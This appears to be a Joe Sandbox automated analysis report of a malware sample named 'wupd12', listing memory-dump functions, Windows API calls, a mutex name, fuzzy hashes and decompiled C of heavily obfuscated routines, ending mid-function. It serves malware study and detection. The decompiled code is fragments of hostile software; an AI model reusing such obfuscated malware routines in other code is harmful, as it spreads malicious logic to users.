Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseHandleRectWindowwsprintf
String ID: hW1A
API String ID: 3021019855-1906527857
Opcode ID: 821e9fe6dad6332b5b2ef6adcbce42e6e39ae567017c2618b770faa76111c7aa
Instruction ID: f0918cc69f9d5de40a85c0b617379cc387ad5bed13439de5cae0e046b2c334e7
Opcode Fuzzy Hash: 821e9fe6dad6332b5b2ef6adcbce42e6e39ae567017c2618b770faa76111c7aa
Instruction Fuzzy Hash: BA41797248E3C0AFC7238BB49C656523FB4AE57354F1A15DBD0C19B1F3D2291829D326

Uniqueness

Uniqueness Score: 100.00%

Function 00404E76, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119windowUNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
SetPaletteEntries.GDI32(hN@,00404E69,1FE31A1E,00001EE1,?,6BFABB73,?,?,?,?,0040396F,6BFABB73,?,?), ref: 00404E8F

Strings

hN@, xrefs: 00404EB9, 00404E76

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseEntriesHandlePaletteRectWindow
String ID: hN@
API String ID: 830144696-1867541518
Opcode ID: a67ce4b959a86c1f02f91c2f5322dcebeb4f87a4be05298c063a5ef9688d5cfa
Instruction ID: fb0fc780e9eae0966cd8c63233e468acf8310fb59ee84263e18f30654a6cf7ad
Opcode Fuzzy Hash: a67ce4b959a86c1f02f91c2f5322dcebeb4f87a4be05298c063a5ef9688d5cfa
Instruction Fuzzy Hash: BC418AA244E3C06FC72387B48C645623FB0AE9B354B1D09DBD0D19F1F3D1295829E36A

Uniqueness

Uniqueness Score: 100.00%

Function 004363B2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileUNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
WriteFile.KERNEL32(h dC,004363A5,30DE1826,00001DC5,00000000,00000000,00008000), ref: 004363CB

Strings

h dC, xrefs: 004363B2

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseFileHandleRectWindowWrite
String ID: h dC
API String ID: 3531660037-165673113
Opcode ID: 981c412cf52bc28247461265b21599c85a7097ab904125d2045c827ac8b1da9f
Instruction ID: 8ed55357c548167475351d94983b200951f4f3af95747979df2d158b070ef5ab
Opcode Fuzzy Hash: 981c412cf52bc28247461265b21599c85a7097ab904125d2045c827ac8b1da9f
Instruction Fuzzy Hash: A0415B6144D3C0AFC72397B48C659623FB4AF5B354F1A15DBD0C19B1F3D2291829D72A

Uniqueness

Uniqueness Score: 100.00%

Function 004014B0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
synchronizationUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(00120001,00000000,prkMtx), ref: 004014C4
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 004014D9
CreateMutexW.KERNEL32(?,00000000,prkMtx), ref: 004014FB

Strings

prkMtx, xrefs: 004014B7, 004014BC, 004014EA

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: Mutex$CreateDescriptorInitializeOpenSecurity
String ID: prkMtx
API String ID: 2801123148-3088725152
Opcode ID: de171551aab4c89a7cad9da1ac7d21496c0f2591934d0cf2b2d00f864cbe2c3e
Instruction ID: 3c9723628717bce1cdeeb9ac089f79be062885c8285b81a591817e9c778c3dff
Opcode Fuzzy Hash: de171551aab4c89a7cad9da1ac7d21496c0f2591934d0cf2b2d00f864cbe2c3e
Instruction Fuzzy Hash: 10F06D71D41318EFEB00DFF09D88B9A77FCEB09741F00813AA504E6190E3749A008FAA

Uniqueness

Uniqueness Score: 100.00%

Function 0040383B, Relevance: 6.1, APIs: 4, Instructions: 121UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
LsaQueryTrustedDomainInfo.ADVAPI32(00403884,0040382E,1FF60FE4,00000AE8), ref: 00403848
TlsGetValue.KERNEL32(00403884,0040382E,1FF60FE4,00000AE8), ref: 0040385A

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseDomainHandleInfoQueryRectTrustedValueWindow
String ID:
API String ID: 1039424664-0
Opcode ID: a21ddfce0b423c61332226cdcfb5a3127fe7bd3e921dc28dad88ba3a05dab188
Instruction ID: 7280f0b0631f7035e0fa50b04bee231c023092756734385905ebe1f57d651082
Opcode Fuzzy Hash: a21ddfce0b423c61332226cdcfb5a3127fe7bd3e921dc28dad88ba3a05dab188
Instruction Fuzzy Hash: AD419C6244E3C0AFC32357B48C656623FB4AF5B350F1944EBD0819B1F3D2295829D32A

Uniqueness

Uniqueness Score: 100.00%

Function 004149F7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3

Strings

h[JA, xrefs: 00414A2C, 004149F7

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseHandleRectWindow
String ID: h[JA
API String ID: 2214946646-3027375912
Opcode ID: 61367a386bf6f969c95af967be14af075e64fdb3a9b3f0a3f219a87dead0287a
Instruction ID: f215c9ef9ef2be6adf5792e6cecff4ad912959bc4a320d99bc60276a2abd114a
Opcode Fuzzy Hash: 61367a386bf6f969c95af967be14af075e64fdb3a9b3f0a3f219a87dead0287a
Instruction Fuzzy Hash: D5416A6248E3C06FC72357B49C65AA23FB09E97394B1E05DBD0D19F1F3D2291869D32A

Uniqueness

Uniqueness Score: 100.00%

Function 0040648E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117memoryUNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
HeapAlloc.KERNEL32 ref: 0040168B

Strings

hd@, xrefs: 004064CA

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustAllocCloseHandleHeapRectWindow
String ID: hd@
API String ID: 1553350776-3907622
Opcode ID: 7fe727ce3a521270ed30c53a145548632fb7cfddc664995c282ba35aad020da9
Instruction ID: 5bdbf995814b28baa6b8cc08fff7f1800fb690b91503edc0a3401dc1cf929105
Opcode Fuzzy Hash: 7fe727ce3a521270ed30c53a145548632fb7cfddc664995c282ba35aad020da9
Instruction Fuzzy Hash: BF418B6144E3C0AFC32347B48C649623FB4AE97344B1A05DBD0C19F1F3D2291C29D36A

Uniqueness

Uniqueness Score: 100.00%

Function 00401561, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95memoryUNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
HeapAlloc.KERNEL32 ref: 0040168B

Strings

dll, xrefs: 00401BC8

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustAllocCloseHandleHeapRectWindow
String ID: dll
API String ID: 1553350776-1037284150
Opcode ID: 01a06bd8c3a86e363ebaf254834842c396136f7f7c88e2f3d91adf180552a6fe
Instruction ID: 634a8ed1e92d33d82e18bece198c764c7a5c041eb50518436673fbd89fec3e61
Opcode Fuzzy Hash: 01a06bd8c3a86e363ebaf254834842c396136f7f7c88e2f3d91adf180552a6fe
Instruction Fuzzy Hash: C031CD7254D3C0AFC71387B89C645567FB0AE9B350B1918DBE0D19B1F3C2295829E36A

Uniqueness

Uniqueness Score: 100.00%

Function 004C550B, Relevance: 5.1, Strings: 4, Instructions: 108
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004C550B(signed int __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				void* _t87;
				void* _t90;
				signed int _t96;
				void* _t110;
				signed int _t115;
				signed int _t116;
				signed int _t121;
				void* _t122;
				signed int _t124;
				void* _t125;
				signed int _t126;
				signed int _t130;

				_a4 = _a4 + 1;
				_t121 = _a4;
				_v12 = _v12 + 0x7937;
				_a8 = _a8 + (__eax & 0x0000f585);
				_t87 = E004C37A0((__eax & 0x0000f585) - _t121 & 0x0000c677, __ebx,  *((intOrPtr*)(__ebx + 0x4992e0)));
				_t122 = _t121 - _v8;
				_a8 = _a8 + 0x353d;
				_a4 = _a4 - _t122;
				_t90 = E004CCED8(_t87 + 0x00006485 & 0x00008e85, __ebx,  *(__ebx + 0x40333c) & _t115,  *((intOrPtr*)(__ebx + 0x4992dc)));
				_t124 = _t122 - 1;
				_t116 = _t115 | 0x00009f17;
				_a4 = _a4 + 0xebcb;
				_v12 = _t116;
				_v12 = _v12 & _t116;
				_v8 = _v8 + 1;
				_t126 = _t125 - 0x1be2;
				_t96 = E004C5C1B((_t90 - 0x000060a5 ^ 0x6b9d) - 0x00000001 | 0x00005c4d, __ebx,  *((intOrPtr*)(__ebx + 0x403808)),  *((intOrPtr*)(__ebx + 0x403804)));
				 *(__ebx + 0x40333c) =  *(__ebx + 0x40333c) ^ _t126;
				_v12 = E004C9700(_t96 ^ 0x00000000, __ebx, _a4 & 0x00007b77,  *((intOrPtr*)(__ebx + 0x403800)));
				_v12 = _v12 | _t126;
				 *(__ebx + 0x40333c) =  *(__ebx + 0x40333c) | _t124;
				 *(__ebx + 0x40333c) =  *(__ebx + 0x40333c) + 1;
				_a8 = _a8 & _t124;
				_v8 = _v8 - 0x662b;
				_v8 = _v8 - 0xea51;
				_v12 = _v12 + 0x6485;
				_a4 = _a4 & _t124;
				_v8 = _v8 + 0x751b;
				_a4 = _a4 | 0x00008088;
				_t130 = (_t126 - 0x00000001 | 0x00006485) - 0xffffffffffffe4d3;
				_a4 = _t130;
				 *(__ebx + 0x40333c) =  *(__ebx + 0x40333c) ^ 0x00006801;
				_t110 = E004CBE83(0xffffffffffffe3de, __ebx,  *((intOrPtr*)(__ebx + 0x4037fc)),  *((intOrPtr*)(__ebx + 0x4037f8)),  *((intOrPtr*)(__ebx + 0x4037f4)));
				_a8 = _a8 | 0x0000aca6;
				_a4 = _a4 + _t110;
				 *(__ebx + 0x40333c) =  *(__ebx + 0x40333c) - _t130;
				 *(__ebx + 0x40333c) = 0xcfd0;
				_a4 = _a4 + 1;
				_a4 = 0xd1ad;
				return _t110 + 0x9a00 - 0x5233;
			}

0x004c551b
0x004c5523
0x004c5526
0x004c552d
0x004c5540
0x004c554b
0x004c554e
0x004c555c
0x004c5565
0x004c5571
0x004c5587
0x004c5599
0x004c55ae
0x004c55b1
0x004c55b4
0x004c55bd
0x004c55d0
0x004c55da
0x004c55eb
0x004c55ee
0x004c55f1
0x004c55f7
0x004c55fd
0x004c5600
0x004c560c
0x004c5614
0x004c5627
0x004c5648
0x004c564f
0x004c5661
0x004c566e
0x004c5671
0x004c568d
0x004c5692
0x004c5699
0x004c56a4
0x004c56aa
0x004c56ba
0x004c56bd
0x004c56d8

Strings

w{, xrefs: 004C55A0
7y, xrefs: 004C5526
=5, xrefs: 004C554E
Q, xrefs: 004C560C

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 7y$=5$Q$w{
API String ID: 0-4187873555
Opcode ID: a6978b742f51b9c74992611e919bbcf663b95fd8e275fde8da0175a82a8ee65f
Instruction ID: 6ac33ec6f077954450a1bf173331365ed231bb72885329f5890477499e04e68f
Opcode Fuzzy Hash: a6978b742f51b9c74992611e919bbcf663b95fd8e275fde8da0175a82a8ee65f
Instruction Fuzzy Hash: 31417072810204AFFF448F65C98A6993FB5EF40319F18C179AD09AE096CB7D87649F54

Uniqueness

Uniqueness Score: 100.00%

Function 004CD22B, Relevance: 5.1, Strings: 4, Instructions: 105
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004CD22B(signed int __eax, void* __ebx, void* _a4, signed int _a8, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _t95;
				void* _t103;
				void* _t107;
				void* _t127;
				signed int _t128;
				signed int _t130;
				intOrPtr _t132;
				void* _t138;

				_a12 = _a12 | 0x000069f8;
				_a8 = _a8 ^ 0x0000a0cd;
				 *((intOrPtr*)(__ebx + 0x403510)) =  *((intOrPtr*)(__ebx + 0x403510)) + 1;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) + 1;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) | 0x0000a0ee;
				 *((intOrPtr*)(__ebx + 0x403510)) =  *((intOrPtr*)(__ebx + 0x403510)) + 1;
				_t95 = E004C9A95((__eax | 0x0000329c) + 0x2768c, __ebx,  *((intOrPtr*)(__ebx + 0x4994a4)));
				_v12 = 0x7ab9;
				_v12 = _t132;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) | _t95 ^ 0x000042e7;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) - 1;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) - 1;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) + 1;
				 *(__ebx + 0x403514) = 0x3109;
				 *(__ebx + 0x403514) = 0xef45;
				_t128 = _t127 + _a8;
				 *((intOrPtr*)(__ebx + 0x403510)) =  *((intOrPtr*)(__ebx + 0x403510)) - 0x4cc;
				_v8 = _v8 + 1;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) & _t128;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) + 0x9061;
				 *(__ebx + 0x403514) = 0xbd02;
				 *((intOrPtr*)(__ebx + 0x403510)) =  *((intOrPtr*)(__ebx + 0x403510));
				_t103 = E004C8B98(0xffffffffffff9fb1, __ebx, __ebx,  *((intOrPtr*)(__ebx + 0x4039d4)),  *((intOrPtr*)(__ebx + 0x4039d0)));
				_v12 = _v12 + 0x996c;
				_v12 = 0xf590;
				_a12 = 0xa57;
				_a12 = _a12 - 1;
				_t130 = (_t128 & 0x000077db) - 0xa77e;
				 *((intOrPtr*)(__ebx + 0x403510)) = 0;
				 *((intOrPtr*)(__ebx + 0x403510)) =  *((intOrPtr*)(__ebx + 0x403510)) + 1;
				_v16 = _v16 - _t130;
				_a8 = _a8 + 1;
				_v16 = _v16 & 0x000082a5;
				_v16 = _v16 & 0x00000000;
				 *(__ebx + 0x403514) =  *(__ebx + 0x403514) | _t130;
				_a8 = _a8 - 1;
				_t107 = E004C3275((_t103 + 0x00002778 & 0x00000000) + 1, __ebx, _a8 & 0x00000172, _t138,  *((intOrPtr*)(__ebx + 0x4994a0)),  *((intOrPtr*)(__ebx + 0x49949c)));
				_v16 = _v16 & (_t130 & 0x00000000) - _t130;
				_a12 = _a12 - 1;
				return _t107;
			}

0x004cd239
0x004cd246
0x004cd254
0x004cd260
0x004cd266
0x004cd27d
0x004cd28e
0x004cd293
0x004cd29f
0x004cd2a3
0x004cd2a9
0x004cd2af
0x004cd2b5
0x004cd2bd
0x004cd2d8
0x004cd2f3
0x004cd2f6
0x004cd30a
0x004cd312
0x004cd334
0x004cd340
0x004cd34a
0x004cd35d
0x004cd36b
0x004cd372
0x004cd37f
0x004cd386
0x004cd38e
0x004cd394
0x004cd3a1
0x004cd3a7
0x004cd3ae
0x004cd3b1
0x004cd3b9
0x004cd3c4
0x004cd3cd
0x004cd3e3
0x004cd3ef
0x004cd3fc
0x004cd405

Strings

P7, xrefs: 004CD2E2
Cz, xrefs: 004CD24D
E, xrefs: 004CD2D8
W, xrefs: 004CD37F

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Cz$E$P7$W
API String ID: 0-3353002704
Opcode ID: 280974f5206750712be2833b5cb69d3c419316295dea3bc85e5a5952d7041466
Instruction ID: 1b99a9593ef0978e865b8f6a484fe9c509898ee8b15d489ea521617b0c0a52f5
Opcode Fuzzy Hash: 280974f5206750712be2833b5cb69d3c419316295dea3bc85e5a5952d7041466
Instruction Fuzzy Hash: 4041B4B2904204AFFF048F55CD467997B78FF8031AF0891699C1DAE196D77C4B248FA8

Uniqueness

Uniqueness Score: 100.00%

Function 004C4227, Relevance: 5.1, Strings: 4, Instructions: 103
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E004C4227(void* __eax, void* __ebx, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t99;
				signed int _t111;
				signed int _t124;
				signed int _t130;
				signed int _t131;
				void* _t135;

				_a4 = _t130;
				_v12 = _v12 - 1;
				 *(__ebx + 0x403434) =  *(__ebx + 0x403434) - 0x265f;
				_a8 = _a8 + _t124;
				_t99 = E004CDAE7(E004C9FA2(_t124, __ebx,  *((intOrPtr*)(__ebx + 0x40393c)),  *((intOrPtr*)(__ebx + 0x403938)),  *((intOrPtr*)(__ebx + 0x403934))), __ebx,  *((intOrPtr*)(__ebx + 0x403930)));
				 *(__ebx + 0x403434) =  *(__ebx + 0x403434) + _t135 +  *(__ebx + 0x403430);
				_t131 = _t130 | 0x000002f2;
				_a4 = _a4 + _t131;
				_a4 = _a4 + 1;
				_v16 = 0xdaab;
				 *(__ebx + 0x403434) =  *(__ebx + 0x403434) + 0x220c;
				 *(__ebx + 0x403434) =  *(__ebx + 0x403434) | 0x0000b30c;
				_v16 = _v16 ^ 0x0000fa2e;
				_a8 = _a8 & 0x00000000;
				 *(__ebx + 0x403430) =  *(__ebx + 0x403430) & _t124;
				 *(__ebx + 0x403434) =  *(__ebx + 0x403434) - 1;
				_v12 = _v12 + 1;
				_v12 = _v12 + 0x970d;
				_v8 = 0x1aaf;
				_a4 = 0x8f1d;
				_a4 = _a4 & 0x0000659a;
				_v12 = _v12 - 1;
				_a4 = 0x265f;
				_a4 = _a4 - 1;
				_v12 = 0x6a59;
				_a4 = _a4 ^ 0x00000000;
				_t111 = E004C9C3B((((_t99 + 0x000081bc - 0x00000001 | 0x0000ff76) + 0x00002e53 & 0x00000000) - 0x3831 + 0x00000001 & 0x00000000 | _v8) & 0x00000000, __ebx,  *(__ebx + 0x403430) & 0x00007e4e,  *((intOrPtr*)(__ebx + 0x4993f4)));
				 *(__ebx + 0x403434) =  *(__ebx + 0x403434) - 0x79e6;
				_a4 = _a4 + 1;
				_a8 = _a8 - 0xd07a;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 - 0x944a;
				_v12 = _v12 | _t131 ^ _v16 | _v12 |  *(__ebx + 0x403430);
				_v8 = 0x4d7b;
				_a4 = _a4 + 0xebd1;
				_v16 = _v16 - 1;
				_v8 = 0xddb4;
				return (_t111 & 0x0000a9e0) - 0xfffffffffffff535 & 0x00007dcb;
			}

0x004c4232
0x004c4241
0x004c4250
0x004c425a
0x004c427a
0x004c428c
0x004c4292
0x004c4298
0x004c429b
0x004c429e
0x004c42a5
0x004c42af
0x004c42c5
0x004c42cc
0x004c42d5
0x004c42e0
0x004c42f5
0x004c4303
0x004c430a
0x004c4312
0x004c4322
0x004c432c
0x004c4334
0x004c433b
0x004c4348
0x004c436a
0x004c437a
0x004c437f
0x004c4392
0x004c4395
0x004c43a1
0x004c43a9
0x004c43b5
0x004c43b8
0x004c43c5
0x004c43cc
0x004c43e0
0x004c43ed

Strings

Yj, xrefs: 004C4348
y, xrefs: 004C437F
{M, xrefs: 004C43B8
_&, xrefs: 004C4334

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Yj$_&${M$y
API String ID: 0-3771182318
Opcode ID: e7d300c73b783f9512deb54f1603196954f71bc0149b0becd4e9e3582ba0061d
Instruction ID: aa2cefb374317dc1ac158ca2494e41e47cc2e32387979e6bd5d1f6d9678231e7
Opcode Fuzzy Hash: e7d300c73b783f9512deb54f1603196954f71bc0149b0becd4e9e3582ba0061d
Instruction Fuzzy Hash: BA415EB2D11208ABFB058F65C58A79DBFB8FF4031AF14C1A99C19AE186C37C57548F54

Uniqueness

Uniqueness Score: 100.00%

Function 004CBA27, Relevance: 5.1, Strings: 4, Instructions: 100
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E004CBA27(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t98;
				signed int _t103;
				signed int _t116;
				signed int _t118;
				signed int _t120;
				signed int _t121;
				void* _t129;
				signed int _t137;

				_t137 = _t116;
				_t118 = (_t116 & _a12) + 0xd30c;
				 *(__ebx + 0x403208) =  *(__ebx + 0x403208) & _t137;
				_a4 = _a4 + _t118;
				 *(__ebx + 0x403208) =  *(__ebx + 0x403208) + 1;
				 *(__ebx + 0x403208) =  *(__ebx + 0x403208) - (_t118 | 0x00000120);
				_t98 = E004C9DF4(__eax + 0xf028, __ebx,  *((intOrPtr*)(__ebx + 0x4990d8)),  *((intOrPtr*)(__ebx + 0x4990d4)));
				_t120 = _t137;
				_v8 = _v8 ^ 0x000099f4;
				_v8 = _v8 + 1;
				 *(__ebx + 0x403208) =  *(__ebx + 0x403208) | 0x00008c8f;
				 *(__ebx + 0x403208) =  *(__ebx + 0x403208) + 0xee36;
				_a12 = _a12 - _t120;
				_v8 = _v8 - _t137;
				 *(__ebx + 0x403208) =  *(__ebx + 0x403208) - 0xe6b6;
				 *(__ebx + 0x403208) = 0xfd8b;
				_v16 = _v16 + 1;
				_v8 = _t129 - _t137 + 0x8560;
				_a8 = _a8 + 0x1146;
				_t103 = _t98 - 0x00003142 + 0x00009349 & 0;
				_t121 = _t120 - 1;
				_a4 = _a4 + 1;
				_a4 = _a4 - 1;
				_v12 = _v12 + 0xd0dd;
				_v8 = _v8 - 0x88cc;
				 *(__ebx + 0x40320c) =  *(__ebx + 0x40320c) - _t103;
				_v16 = 0x2534;
				_a8 = 0x8a;
				_v12 = _v12 - _t103 + 0xb0c;
				 *(__ebx + 0x40320c) =  *(__ebx + 0x40320c) + 0x29c6;
				_a4 = _a4 - 0x8e75;
				_a8 = _a8 ^ 0x000045be;
				_a8 = _a8 - 1;
				 *(__ebx + 0x403208) = _t121;
				_v16 = _v16 - 0x7278;
				_v12 = _v12 ^ 0x0000008a;
				_a4 = _a4 ^ 0x00000d31;
				_v8 = _v8 - (_t137 ^ _v8);
				_v16 = _v16 | _t121;
				_a12 = _a12 | 0x0000500a;
				_a8 = _a8 + 0x6fd9;
				return E004C9539((((_t103 + 0x00000b0c | _a12) + 0x0000c29e ^ 0x0000760c) - 0x00007dcf ^ 0x00000000) - 0xffffffffffffd49a + 0x3277, __ebx,  *(__ebx + 0x40320c) & 0x0000812b,  *((intOrPtr*)(__ebx + 0x403620))) ^ 0x00000000;
			}

0x004cba37
0x004cba3c
0x004cba42
0x004cba48
0x004cba51
0x004cba57
0x004cba71
0x004cba89
0x004cba8b
0x004cba92
0x004cba95
0x004cbaae
0x004cbabb
0x004cbac3
0x004cbac6
0x004cbad0
0x004cbae1
0x004cbae9
0x004cbaec
0x004cbaf3
0x004cbaf8
0x004cbaf9
0x004cbafc
0x004cbaff
0x004cbb0d
0x004cbb14
0x004cbb21
0x004cbb28
0x004cbb32
0x004cbb46
0x004cbb55
0x004cbb5f
0x004cbb73
0x004cbb7b
0x004cbb90
0x004cbb97
0x004cbb9a
0x004cbba7
0x004cbbaf
0x004cbbb7
0x004cbbbe
0x004cbbdc

Strings

1, xrefs: 004CBB9A
xr, xrefs: 004CBB90
6, xrefs: 004CBAAE
P, xrefs: 004CBBB7

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: P$1$6$xr
API String ID: 0-64018799
Opcode ID: cf5beee5482bd534c935ea4a6bedbc4d297ed939406fff146d58efd223c92c91
Instruction ID: 5aca04f5bf2fe2620063401ab93fa25270fd18318d9750fcfbb830dd2c0ecb83
Opcode Fuzzy Hash: cf5beee5482bd534c935ea4a6bedbc4d297ed939406fff146d58efd223c92c91
Instruction Fuzzy Hash: F5415E72810208EBFF04CF65C98969E7B75FF40319F28C1AEAC18AA596C77C8B549F54

Uniqueness

Uniqueness Score: 100.00%

Function 004CB894, Relevance: 5.1, Strings: 4, Instructions: 98
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E004CB894(void* __eax, void* __ebx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _t101;
				void* _t107;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;
				void* _t118;
				void* _t122;
				signed int _t123;

				_v8 = _v8 | 0x0000a40e;
				_v8 = _v8 + _t118;
				_v8 = _v8 - 1;
				_a4 = 0x5866;
				 *(__ebx + 0x403498) =  *(__ebx + 0x403498) | _t111;
				 *(__ebx + 0x403498) =  *(__ebx + 0x403498) ^ _t111;
				_a8 = _a8 - 0x4f36;
				 *(__ebx + 0x403498) =  *(__ebx + 0x403498) + 0x551c;
				_a8 = 0x6591;
				_t101 = _t111 + 0x4e6c - 0xee19;
				 *(__ebx + 0x40349c) =  *(__ebx + 0x40349c) & _t101;
				 *(__ebx + 0x403498) =  *(__ebx + 0x403498) + _t122;
				 *(__ebx + 0x403498) =  *(__ebx + 0x403498) - 0x395f;
				_v8 = 0xee85;
				 *(__ebx + 0x40349c) = 0xfac1;
				 *(__ebx + 0x40349c) =  *(__ebx + 0x40349c) + _t101;
				_t123 =  *(__ebx + 0x40349c);
				_a8 = _t123;
				_v8 = _v8 - 1;
				_v8 = _v8 + 0x16d6;
				_v8 = _v8 & _t123;
				_a8 = _a8 & 0x00000000;
				_v8 = _v8 ^ (_t101 + 0x0000034a - 0x0000a6e1 ^ 0x00009e93) - 0x000070be;
				_v8 = _v8 + 1;
				_t107 = E004C860B((_t101 + 0x0000034a - 0x0000a6e1 ^ 0x00009e93) - 0x70bd, __ebx,  *((intOrPtr*)(__ebx + 0x403978)),  *((intOrPtr*)(__ebx + 0x403974)));
				_t114 = (_t111 & 0) + 0x4c0e;
				_a8 = _a8 + _t107;
				 *(__ebx + 0x403498) =  *(__ebx + 0x403498) | 0x0000ef46;
				_v8 = _v8 & _t114;
